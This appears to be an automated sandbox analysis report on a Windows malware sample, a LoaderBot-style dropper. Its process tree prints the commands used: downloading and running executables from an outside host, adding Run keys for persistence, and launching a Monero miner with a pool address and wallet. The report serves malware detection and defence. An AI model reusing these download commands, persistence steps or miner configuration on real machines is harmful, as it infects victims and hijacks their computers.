Analysis
-
max time kernel
151s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
10/01/2022, 08:28
Static task
static1
Behavioral task
behavioral1
Sample
136860e019115c0eefd8cf669dd8963e.exe
Resource
win7-en-20211208
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
136860e019115c0eefd8cf669dd8963e.exe
Resource
win10-en-20211208
0 signatures
0 seconds
General
-
Target
136860e019115c0eefd8cf669dd8963e.exe
-
Size
349KB
-
MD5
136860e019115c0eefd8cf669dd8963e
-
SHA1
fa99887f95f5e0fe48e37c2d464eb56ef1619031
-
SHA256
4da864854d368ab640245f8174d247e0b9947045712d2d7449e25e7074b8587c
-
SHA512
d5fa4175cc0d4a81325f693034e216e6122a4fe551a362f449ad21c5af757fc7f3f75fcaeacf3e7bbe393e2708d371c46ae16f9b8b5762fb9836d8397bf973e3
Score
10/10
Malware Config
Signatures
-
LoaderBot executable 3 IoCs
resource yara_rule behavioral2/memory/608-148-0x0000000000BD0000-0x000000000102B000-memory.dmp loaderbot behavioral2/memory/608-154-0x0000000000BD0000-0x000000000102B000-memory.dmp loaderbot behavioral2/memory/608-155-0x0000000000BD0000-0x000000000102B000-memory.dmp loaderbot -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 2460 WScript.exe -
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
pid Process 3364 extd.exe 432 extd.exe 3068 setup1.exe 1584 extd.exe 1040 setup2.exe 3284 extd.exe 608 setup3.exe 720 extd.exe 3100 Driver.exe -
resource yara_rule behavioral2/files/0x000500000001ab16-118.dat upx behavioral2/files/0x000500000001ab16-119.dat upx behavioral2/files/0x000500000001ab16-124.dat upx behavioral2/files/0x000500000001ab16-129.dat upx behavioral2/files/0x000500000001ab16-135.dat upx behavioral2/files/0x000500000001ab16-149.dat upx -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup3.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup3.exe" setup3.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1040 setup2.exe 608 setup3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 3740 3068 WerFault.exe 74 -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings cmd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1040 setup2.exe 1040 setup2.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe 608 setup3.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 628 Process not Found -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeRestorePrivilege 3740 WerFault.exe Token: SeBackupPrivilege 3740 WerFault.exe Token: SeDebugPrivilege 3740 WerFault.exe Token: SeDebugPrivilege 1040 setup2.exe Token: SeDebugPrivilege 608 setup3.exe Token: SeLockMemoryPrivilege 3100 Driver.exe Token: SeLockMemoryPrivilege 3100 Driver.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2496 wrote to memory of 3844 2496 136860e019115c0eefd8cf669dd8963e.exe 69 PID 2496 wrote to memory of 3844 2496 136860e019115c0eefd8cf669dd8963e.exe 69 PID 3844 wrote to memory of 3364 3844 cmd.exe 70 PID 3844 wrote to memory of 3364 3844 cmd.exe 70 PID 3844 wrote to memory of 3364 3844 cmd.exe 70 PID 3844 wrote to memory of 2460 3844 cmd.exe 71 PID 3844 wrote to memory of 2460 3844 cmd.exe 71 PID 3844 wrote to memory of 432 3844 cmd.exe 72 PID 3844 wrote to memory of 432 3844 cmd.exe 72 PID 3844 wrote to memory of 432 3844 cmd.exe 72 PID 3844 wrote to memory of 3068 3844 cmd.exe 74 PID 3844 wrote to memory of 3068 3844 cmd.exe 74 PID 3844 wrote to memory of 3068 3844 cmd.exe 74 PID 3844 wrote to memory of 1584 3844 cmd.exe 75 PID 3844 wrote to memory of 1584 3844 cmd.exe 75 PID 3844 wrote to memory of 1584 3844 cmd.exe 75 PID 3844 wrote to memory of 1040 3844 cmd.exe 78 PID 3844 wrote to memory of 1040 3844 cmd.exe 78 PID 3844 wrote to memory of 1040 3844 cmd.exe 78 PID 3844 wrote to memory of 3284 3844 cmd.exe 79 PID 3844 wrote to memory of 3284 3844 cmd.exe 79 PID 3844 wrote to memory of 3284 3844 cmd.exe 79 PID 3844 wrote to memory of 608 3844 cmd.exe 80 PID 3844 wrote to memory of 608 3844 cmd.exe 80 PID 3844 wrote to memory of 608 3844 cmd.exe 80 PID 3844 wrote to memory of 720 3844 cmd.exe 81 PID 3844 wrote to memory of 720 3844 cmd.exe 81 PID 3844 wrote to memory of 720 3844 cmd.exe 81 PID 608 wrote to memory of 3100 608 setup3.exe 83 PID 608 wrote to memory of 3100 608 setup3.exe 83
Processes
-
C:\Users\Admin\AppData\Local\Temp\136860e019115c0eefd8cf669dd8963e.exe"C:\Users\Admin\AppData\Local\Temp\136860e019115c0eefd8cf669dd8963e.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9905.tmp\9906.tmp\9907.bat C:\Users\Admin\AppData\Local\Temp\136860e019115c0eefd8cf669dd8963e.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Users\Admin\AppData\Local\Temp\9905.tmp\9906.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9905.tmp\9906.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3364
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31365\123.vbs"3⤵
- Blocklisted process makes network request
PID:2460
-
-
C:\Users\Admin\AppData\Local\Temp\9905.tmp\9906.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9905.tmp\9906.tmp\extd.exe "/download" "http://a0617224.xsph.ru/1.exe" "setup1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:432
-
-
C:\Users\Admin\AppData\Local\Temp\31365\setup1.exesetup1.exe3⤵
- Executes dropped EXE
PID:3068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 4124⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
-
C:\Users\Admin\AppData\Local\Temp\9905.tmp\9906.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9905.tmp\9906.tmp\extd.exe "/download" "http://a0617224.xsph.ru/2.exe" "setup2.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1584
-
-
C:\Users\Admin\AppData\Local\Temp\31365\setup2.exesetup2.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Users\Admin\AppData\Local\Temp\9905.tmp\9906.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9905.tmp\9906.tmp\extd.exe "/download" "http://a0617224.xsph.ru/3.exe" "setup3.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3284
-
-
C:\Users\Admin\AppData\Local\Temp\31365\setup3.exesetup3.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
-
-
C:\Users\Admin\AppData\Local\Temp\9905.tmp\9906.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9905.tmp\9906.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:720
-
-